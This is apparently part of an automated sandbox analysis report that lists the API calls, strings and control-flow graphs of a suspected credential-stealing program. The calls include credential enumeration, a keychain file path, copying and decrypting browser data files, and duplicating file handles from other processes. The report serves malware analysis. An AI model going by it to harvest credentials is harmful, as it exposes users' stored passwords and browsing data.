                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                  • memset.MSVCRT ref: 00413D7F
                  • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                  • memset.MSVCRT ref: 00413E07
                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                  • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,0000022C), ref: 00413F1A
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@CloseHandleProcess32memset$AddressChangeCreateFindFirstModuleNextNotificationOpenProcProcessSnapshotToolhelp32
                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                  • API String ID: 2191996607-1740548384
                  • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                  • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                  • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                  • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                  • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                  • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                  • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                  • LockResource.KERNEL32(00000000), ref: 0040B5DD
                  • memcpy.MSVCRT ref: 0040B60D
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                  • String ID: BIN
                  • API String ID: 1668488027-1015027815
                  • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                  • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                  • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                  • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                  APIs
                    • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                    • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                    • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                  • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                  • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                  • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                  • String ID:
                  • API String ID: 2947809556-0
                  • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                  • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                  • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                  • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                  APIs
                  • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                  • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileFind$FirstNext
                  • String ID:
                  • API String ID: 1690352074-0
                  • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                  • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                  • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                  • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                  APIs
                  • memset.MSVCRT ref: 0041898C
                  • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: InfoSystemmemset
                  • String ID:
                  • API String ID: 3558857096-0
                  • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                  • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                  • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                  • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 42 445823-445826 14->42 15->16 22 445672-445683 call 40a889 call 403fbe 16->22 23 4455fb-445601 16->23 49 445879-44587c 18->49 24 44594f-445958 19->24 25 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->25 82 445685 22->82 83 4456b2-4456b5 call 40b1ab 22->83 34 445605-445607 23->34 35 445603 23->35 32 4459f2-4459fa 24->32 33 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 24->33 134 44592d-445945 call 40b6ef 25->134 135 44594a 25->135 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 32->44 45 445b29-445b32 32->45 153 4459d0-4459e8 call 40b6ef 33->153 154 4459ed 33->154 34->22 41 445609-44560d 34->41 35->34 38->3 39->38 41->22 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 63 4458a2-4458aa call 40b1ab 49->63 64 44587e 49->64 150 445665-445670 call 40b1ab 50->150 151 445643-445663 call 40a9b5 call 4087b3 50->151 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 87 445fae-445fb2 60->87 88 445d2b-445d3b 60->88 168 445cf5 61->168 169 445cfc-445d03 61->169 63->19 80 445884-44589d call 40a9b5 call 4087b3 64->80 137 445849 66->137 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 156 44589f 80->156 81->53 99 44568b-4456a4 call 40a9b5 call 4087b3 82->99 115 4456ba-4456c4 83->115 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->90 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 129 4457f9 115->129 130 4456ca-4456d3 call 413cfa call 413d4c 115->130 129->6 172 4456d8-4456f7 call 40b2cc call 413fa6 130->172 134->135 135->24 137->51 150->115 151->150 153->154 154->32 156->63 158->83 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->87 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->87 255 445f9b 218->255 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                  APIs
                  • memset.MSVCRT ref: 004455C2
                  • wcsrchr.MSVCRT ref: 004455DA
                  • memset.MSVCRT ref: 0044570D
                  • memset.MSVCRT ref: 00445725
                    • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                    • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                    • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                    • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                    • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                    • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                    • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                    • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                  • memset.MSVCRT ref: 0044573D
                  • memset.MSVCRT ref: 00445755
                  • memset.MSVCRT ref: 004458CB
                  • memset.MSVCRT ref: 004458E3
                  • memset.MSVCRT ref: 0044596E
                  • memset.MSVCRT ref: 00445A10
                  • memset.MSVCRT ref: 00445A28
                  • memset.MSVCRT ref: 00445AC6
                    • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                    • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                    • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                    • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                    • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                  • memset.MSVCRT ref: 00445B52
                  • memset.MSVCRT ref: 00445B6A
                  • memset.MSVCRT ref: 00445C9B
                  • memset.MSVCRT ref: 00445CB3
                  • _wcsicmp.MSVCRT ref: 00445D56
                  • memset.MSVCRT ref: 00445B82
                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                  • memset.MSVCRT ref: 00445986
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                  • String ID: *.*$Apple Computer\Preferences\keychain.plist
                  • API String ID: 2745753283-3798722523
                  • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                  • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                  • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                  • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                  Control-flow Graph

                  APIs
                    • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                    • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                    • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                    • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                  • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                  • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                  • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                  • String ID: $/deleteregkey$/savelangfile
                  • API String ID: 2744995895-28296030
                  • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                  • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                  • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                  • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                  Control-flow Graph

                  APIs
                  • memset.MSVCRT ref: 0040B71C
                    • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                    • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                  • wcsrchr.MSVCRT ref: 0040B738
                  • memset.MSVCRT ref: 0040B756
                  • memset.MSVCRT ref: 0040B7F5
                  • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                  • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                  • memset.MSVCRT ref: 0040B851
                  • memset.MSVCRT ref: 0040B8CA
                  • memcmp.MSVCRT ref: 0040B9BF
                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                  • memset.MSVCRT ref: 0040BB53
                  • memcpy.MSVCRT ref: 0040BB66
                  • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                  • String ID: chp$v10
                  • API String ID: 170802307-2783969131
                  • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                  • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                  • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                  • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 512 40e304-40e316 call 406e8f 510->512 516 40e476-40e483 call 406b53 512->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->512 524->509 530 40e497-40e49f ??3@YAXPAX@Z 524->530 530->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 549 40e3b0 542->549 550 40e3b3-40e3c1 wcschr 542->550 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 551 40e3fb-40e40c memcpy 548->551 552 40e40f-40e414 548->552 549->550 550->541 555 40e3c3-40e3c6 550->555 551->552 553 40e416-40e427 memcpy 552->553 554 40e42a-40e42f 552->554 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                  APIs
                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                  • memset.MSVCRT ref: 0040E380
                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                    • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                  • wcschr.MSVCRT ref: 0040E3B8
                  • memcpy.MSVCRT ref: 0040E3EC
                  • memcpy.MSVCRT ref: 0040E407
                  • memcpy.MSVCRT ref: 0040E422
                  • memcpy.MSVCRT ref: 0040E43D
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                  • API String ID: 3073804840-2252543386
                  • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                  • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                  • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                  • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 601 4094f7-4094fa call 424f26 598->601 600->567 601->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 615 4093e4-4093fb call 4253af * 2 613->615 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->601 627 409401-409403 615->627 616->617 618 409333-409345 memcmp 617->618 619 4092e5-4092ec 617->619 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->601 628 409409-40941b memcmp 627->628 628->601 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->601 633 4094b8-4094ed memcpy * 2 630->633 631->601 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->601
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memcmp$ByteCharMultiWidememset
                  • String ID:
                  • API String ID: 3715365532-3916222277
                  • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                  • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                  • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                  • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                  Control-flow Graph

                  APIs
                    • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                    • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                    • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                    • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                    • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                    • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                  • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                  • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                  • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                  • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                  • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                  • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                  • CloseHandle.KERNEL32(00000000), ref: 0040E143
                  • CloseHandle.KERNEL32(?), ref: 0040E148
                  • CloseHandle.KERNEL32(?), ref: 0040E14D
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                  • String ID: bhv
                  • API String ID: 327780389-2689659898
                  • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                  • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                  • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                  • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                  APIs
                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                  • API String ID: 2941347001-70141382
                  • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                  • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                  • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                  • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                  Control-flow Graph

                  • Executed
                  • Not Executed
